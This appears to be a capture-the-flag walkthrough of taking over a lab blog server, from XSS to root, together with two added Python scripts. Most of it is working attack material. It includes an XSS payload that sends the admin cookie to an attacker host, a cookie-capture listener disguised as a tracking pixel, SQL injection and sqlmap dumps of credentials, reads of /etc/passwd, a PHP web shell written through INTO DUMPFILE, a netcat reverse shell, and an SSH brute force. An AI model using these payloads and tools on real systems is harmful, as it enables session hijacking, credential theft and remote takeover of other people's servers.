- Open Burp, click on options and scan the application.
* nmap 10.10.1.19 -F (ports 80 and 22 are open)
- Looking at the URL, there are only 2 valid id values:
http://10.10.1.19/post.php?id=1
http://10.10.1.19/post.php?id=2
Trying a third id returns an error: ERROR: INTEGER REQUIRED.
- On id 1 or 2 there is a form, which is the candidate for XSS: choose an ID, look for the injection point, fill in the form and check the response.
- The submission comes back as ID number 3, which means the injection point is the text box.
- Try to insert a script into it. There is an admin login, so use a cookie-stealing script to get the admin's session cookie. Start a listener on the attacker machine (10.10.10.6):
* python -m SimpleHTTPServer
and insert a script into the text box on the page:
* <script>new Image().src="http://10.10.10.6:8000/a.php?cookie="+encodeURI(document.cookie);</script>
When the admin views the post, the request shows up in the SimpleHTTPServer log (a.php does not need to exist; the GET line with the cookie is logged anyway, just with a 404). Copy the PHPSESSID:
PHPSESSID=5j6hmv09krd85m6j2mfkrume12
- Paste it into Tamper Data / Cookie Manager and try to log in as admin. Check the control panel and try to edit a post.
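As an added example (not code from the original write-up): a small replacement for the SimpleHTTPServer listener above that parses the exfiltrated cookie instead of only logging the raw request line, and answers with a 1x1 GIF so the image load looks like an ordinary tracking pixel. The port, the path a.php and the sample request paths in the test are assumptions carried over from the payload above, not captures from the target.

```python
# Added example: cookie-exfiltration listener for the <script>new Image().src=...</script> payload.
# Not part of the original write-up; port/path are assumptions matching the payload above.
from http.server import BaseHTTPRequestHandler, HTTPServer
from http.cookies import SimpleCookie
from urllib.parse import urlsplit, unquote

# encodeURI() leaves '=' and ';' unescaped, so the request path looks like
#   /a.php?cookie=PHPSESSID=5j6h...;%20theme=dark
# parse_qs on older Pythons splits on ';' as well as '&', which would cut the
# cookie string short, so the cookie= pair is pulled out by hand instead.
def parse_exfil_path(path):
    """Return {cookie_name: value} for a request path produced by the payload, or {} if there is none."""
    query = urlsplit(path).query
    raw = ""
    for pair in query.split("&"):
        if pair.startswith("cookie="):
            raw = unquote(pair[len("cookie="):])  # %20 -> ' ', nothing else was encoded
            break
    jar = SimpleCookie()
    jar.load(raw)  # understands "name=value; name2=value2" exactly as document.cookie emits it
    return {name: morsel.value for name, morsel in jar.items()}

# Minimal 1x1 transparent GIF (43 bytes) returned to the victim's browser.
GIF = bytes.fromhex(
    "47494638396101000100800000000000ffffff21f90401000000002c00000000010001000002024401003b"
)

class ExfilHandler(BaseHTTPRequestHandler):
    captured = []  # every cookie dict seen so far, in arrival order

    def do_GET(self):
        cookies = parse_exfil_path(self.path)
        if cookies:
            ExfilHandler.captured.append(cookies)
            print("[+] cookie from %s: %s" % (self.client_address[0], cookies))
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.send_header("Content-Length", str(len(GIF)))
        self.end_headers()
        self.wfile.write(GIF)

def serve(port=8000):
    """Listen on all interfaces; the payload points at http://ATTACKER:8000/a.php?cookie=..."""
    HTTPServer(("0.0.0.0", port), ExfilHandler).serve_forever()

if __name__ == "__main__":
    serve()
```

Run it in place of SimpleHTTPServer; a session cookie that carries the HttpOnly flag would not reach document.cookie at all, so an empty capture from a page you know is vulnerable usually means that flag, not a failed injection.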
- We can try SQL injection on the edit page (the id parameter is not validated here the way it is in post.php).
Boolean-based proof:
http://10.10.1.19/admin/edit.php?id=2%20and%201=0 -> False (post not shown)
http://10.10.1.19/admin/edit.php?id=2%20and%201=1 -> True (post shown)
Union-based, 4 columns:
http://10.10.1.19/admin/edit.php?id=1%20union%20select%201,2,3,4
- Use a high or non-existent id like -1 or 100, so the original row returns nothing and only the union row is displayed, and check which of the numbers 1,2,3,4 appear in the page:
http://10.10.1.19/admin/edit.php?id=-1%20union%20select%201,2,3,4
- Replace the column numbers that are displayed with user(), version(), database() to learn more about the database.
- With sqlmap, find the admin password. The admin page needs the session cookie (a fresh PHPSESSID here), so pass it:
sqlmap -u "http://10.10.1.19/admin/edit.php?id=-1" --cookie="PHPSESSID=4gaol0csg9ai0qva1qrb3bbfv7" -D blog -T users --columns --dump
Username: admin
Password: P4ssw0rd
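As an added example (not code from the original write-up), the two findings above and the sqlmap dump rebuilt against a throwaway SQLite database so they can be run offline: an edit.php-style handler that concatenates the id into the query (beside a post.php-style one that rejects non-integers and binds the value), the boolean and union proofs against it, and the character-by-character blind extraction that sqlmap automates. The table and column names (posts, users, username, password) and the stored password are constructed for the example, not dumped from the target; the real target is MySQL, and the only dialect difference in the payload is noted in a comment.

```python
# Added example, not from the original write-up: simulated edit.php?id= injection and blind extraction.
# Table/column names and the stored password are constructed test data.
import sqlite3

def make_vulnerable_app():
    """In-memory stand-in for the blog database (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER, title TEXT, body TEXT, author TEXT)")
    conn.executemany("INSERT INTO posts VALUES (?,?,?,?)", [
        (1, "First post", "hello", "admin"),
        (2, "Second post", "world", "admin"),
    ])
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'P4ssw0rd')")  # constructed, matches the dump above
    return conn

def edit_php(conn, id_param):
    """What admin/edit.php evidently does: the id goes straight into the SQL string."""
    return conn.execute("SELECT id, title, body, author FROM posts WHERE id=" + id_param).fetchall()

def post_php(conn, id_param):
    """What post.php does instead: reject non-integers ("ERROR: INTEGER REQUIRED") and bind the value."""
    if not id_param.lstrip("-").isdigit():
        raise ValueError("ERROR: INTEGER REQUIRED")
    return conn.execute("SELECT id, title, body, author FROM posts WHERE id=?", (int(id_param),)).fetchall()

def page_is_true(conn, id_param):
    """The boolean oracle: the edit page shows the post when the WHERE clause is true, nothing when it is false."""
    return len(edit_php(conn, id_param)) > 0

def blind_extract(conn, subquery, max_len=64):
    """Recover the single value returned by subquery through the True/False difference,
    one character per binary search over its code point (7 requests per character)."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # SQLite spells MySQL's ascii(substring(...)) as unicode(substr(...)); otherwise the payload is the same.
            payload = "2 and unicode(substr((%s),%d,1))>%d" % (subquery, pos, mid)
            if page_is_true(conn, payload):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break  # substr past the end gives '', unicode('') is NULL, every comparison is False: string finished
        result += chr(lo)
    return result

if __name__ == "__main__":
    db = make_vulnerable_app()
    print("2 and 1=0 ->", page_is_true(db, "2 and 1=0"))
    print("2 and 1=1 ->", page_is_true(db, "2 and 1=1"))
    print("union     ->", edit_php(db, "-1 union select 1,username,password,4 from users"))
    print("blind     ->", blind_extract(db, "select password from users where username='admin'"))
```

The union row is the fast path when a column is echoed on the page; the blind loop is what you fall back to when nothing is echoed but the True/False difference survives, and it is the same thing sqlmap's boolean-based technique does with the --cookie session above.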
We can use load_file("path") in the union query to read files (MySQL; the database user needs the FILE privilege):
load_file("/etc/passwd"), and likewise /etc/group or /etc/services
- Open DirBuster to enumerate the folders and look for one the database user can write to, so we can drop a file there.
- http://10.10.1.19/admin/edit.php?id=-1 union select "<?php system($_GET['c']);?>",2,3,4 into dumpfile '/var/www/images/text4.php'
- Check the file by requesting it with a command in the c parameter (we have a half shell: one command per request, no interactive session).
- Open a session with nc for more comfortable work from the command line. Start a listener on the attacker machine first (nc -lvnp 1235 on 10.10.10.6), then request:
http://10.10.1.19/images/text4.php?c=nc -n 10.10.10.6 1235 -e /bin/bash
(the browser URL-encodes the spaces; with curl send them as %20. The -e option needs the traditional netcat or ncat, the OpenBSD nc does not have it.)
- After several days, I didn't find an exploit. I brute-forced the user's SSH password with medusa:
medusa -u user -P rockyou.txt -h 10.10.1.19 -M ssh
The password is live.
- Log in with ssh user@10.10.1.19 (password: live)
- sudo su
- And I am root!